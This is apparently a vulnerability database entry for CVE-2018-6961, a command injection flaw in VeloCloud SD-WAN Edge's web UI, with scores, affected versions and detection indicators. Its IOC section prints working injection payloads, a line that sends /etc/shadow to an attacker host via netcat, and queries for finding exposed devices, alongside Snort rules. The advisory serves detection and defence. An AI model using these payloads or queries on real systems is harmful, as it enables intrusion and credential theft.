CVE-2018-6961
Published: 2018-06-11


Priority: P1 (90, high)
CVSS 3.1: 8.1
Vector: AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV, ITW, EXPLOIT, Initial access
CISA Known Exploited Vulnerability, due 2022-04-15
Exploited in the wild
EPSS: 86.43% (99.7th percentile)
VMware NSX SD-WAN Edge by VeloCloud prior to version 3.1.0 contains a command injection vulnerability in the local web UI component. This component is disabled by default and should not be enabled on untrusted networks. VeloCloud by VMware will be removing this service from the product in future releases. Successful exploitation of this issue could result in remote code execution.

Affected (2 ranges)

Vendor   Product                  Version range   Fixed in
vmware   nsx_sd-wan_by_velocloud  < 3.1.0         3.1.0
vmware   nsx_sd-wan_by_velocloud  -               -

Detection & IOCs (extracted from sources)

url: /scripts/ajaxPortal.lua
command: destination=8.8.8.8`id`&source=ge1&test=TRACEROUTE&requestTimeout=900&auth_token=&_cmd=run_diagnostic
command: destination=8.8.8.8$(id;echo {{rand}})&source=ge1&test=TRACEROUTE&requestTimeout=900&auth_token=&_cmd=run_diagnostic
command: $(cat /etc/shadow |nc <lhost> <lport>)
snort: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT VMware NSX SD-WAN Command Injection"; flow:established,to_server; http.uri; content:"/scripts/ajaxPortal.lua"; fast_pattern; http.request_body; content:"destination="; content:"source="; content:"test="; content:"&requestTimeout="; content:"auth_token="; content:"cmd=run_diagnostic"; pcre:"/destination=[^&]*\x24\x28/i"; reference:url,exploit-db.com/exploits/44959/; reference:cve,2018-6961; classtype:attempted-user; sid:2025767; rev:3; metadata:attack_target Server, created_at 2018_07_02, cve CVE_2018_6961, deployment Datacenter, performance_impact Low, confidence High, signature_severity Critical, updated_at 2020_08_25, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
snort: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT VMware NSX SD-WAN Command Injection 2"; flow:established,to_server; http.uri; content:"/scripts/ajaxPortal.lua"; fast_pattern; http.request_body; content:"name="; content:"source="; content:"test="; content:"&requestTimeout="; content:"auth_token="; content:"cmd=run_diagnostic"; pcre:"/name=[^&]*\x24\x28/i"; reference:url,exploit-db.com/exploits/44959/; reference:cve,2018-6961; classtype:attempted-user; sid:2025768; rev:3; metadata:attack_target Server, created_at 2018_07_02, cve CVE_2018_6961, deployment Datacenter, performance_impact Low, confidence High, signature_severity Critical, updated_at 2020_08_25, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
  • The exploit targets the unauthenticated POST endpoint /scripts/ajaxPortal.lua with _cmd=run_diagnostic and shell metacharacters ($() or backticks) injected into the 'destination' or 'name' POST body parameters.
  • A successful exploitation response contains JSON status OK and output matching uid=/gid= from the injected 'id' command; the absence of 'UNKNOWN_COMMAND' in the response body also indicates success.
  • Shodan/FOFA queries for exposed VeloCloud web UIs can identify the attack surface: title:"VeloCloud" (Shodan) and title="VeloCloud" (FOFA).
  • The exploit sends the X-Requested-With: XMLHttpRequest header alongside Content-Type: application/x-www-form-urlencoded; charset=UTF-8, which can be used as an additional filter in HTTP traffic analysis.
  • The DNS injection variant uses the 'name' POST parameter instead of 'destination', with test=DNS_TEST, and is also injectable with $() shell syntax.
  • The vulnerable local web UI component is disabled by default; exploitation is only possible if it has been explicitly enabled, and VMware advises that it should not be enabled on untrusted networks.
  • The exploit author notes that the target runs a slimmed-down Linux, so standard reverse shell techniques (e.g., nc -e) may not work; exfiltration via piping stdout to netcat is the demonstrated approach.

CVSS provenance

Source     Version  Score  Severity  Vector
nvd        v3.1     8.1    HIGH      CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd        v2.0     6.8    MEDIUM    AV:N/AC:M/Au:N/C:P/I:P/A:P
vulncheck  -        8.1    HIGH      -
cisa       -        8.1    HIGH      -